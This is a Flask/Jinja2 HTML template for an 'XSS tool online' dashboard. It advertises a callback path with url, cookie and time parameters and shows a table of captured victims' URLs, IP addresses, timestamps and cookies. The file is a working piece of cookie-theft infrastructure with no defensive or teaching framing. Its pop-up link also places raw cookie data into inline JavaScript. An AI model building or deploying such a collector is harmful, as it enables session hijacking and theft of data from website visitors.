{% extends 'appliacation/my_base.html' %}
{% import "bootstrap/wtf.html" as wtf %}
<html lang="en">
{% block head %}
    {{ super() }}

		<style type="text/css">
			/*表格样式*/
			table {
				width: 90%;
				background: #ccc;
				margin: 10px auto;
				border-collapse: collapse;/*border-collapse:collapse合并内外边距(去除表格单元格默认的2个像素内外边距*/
			}
			th,td {
				height: 25px;
				line-height: 25px;
				text-align: center;
				border: 1px solid #ccc;
			}
			th {
				background: #d7e4ff;
				font-weight: normal;
			}
			tr {
				background: #fff;
			}
			tr:hover {
				background: #eacbf0;
			}
			td a {
				color: #06f;
				text-decoration: none;
			}
			td a:hover {
				color: #06f;
				text-decoration: underline;
			}
		</style>
{% endblock %}
{% block page_content %}
    <div class="page-header">
    <h1>XJUSEC XSS TOOL ONLINE</h1>
        <p>反弹链接：
                /XJUSEC/getinfo</p>
        <p>参数：
                url --> url ip --> cookie --> cookie time --> time </p>
    </div>
{#    <div class="">#}
        <form action={{ url_for('my_web.xsser') }} method="post">
    {{ wtf.quick_form(form) }}

    </form>
    <table>
			<tr>
				<!-- th为表格标题栏-->
				<th>ID</th>
				<th>URL</th>
				<th>IP</th>
				<th>TIME</th>
                <th>COOKIES</th>
                <th>ViewAll</th>
			</tr>
        {% for i in id_list %}
			<tr>
				<td>{{ i }}</td>

				<td>{{  load_data[i]['url'] }}</td>

				<td>{{ load_data[i]['ip'] }}</td>

				<td>{{ load_data[i]['time'] }}</td>
                <td style="overflow:hidden; white-space:nowrap; text-overflow:ellipsis;">{{ load_data[i]['cookie'] }}</td>
				<td>
					<a href="#" onclick="alert('{{
                            "cookie : "+load_data[i]['cookie']
                            }}');">查看</a>
				</td>
			</tr>
    {% endfor %}
		</table>
{% endblock %}

</body>
</html>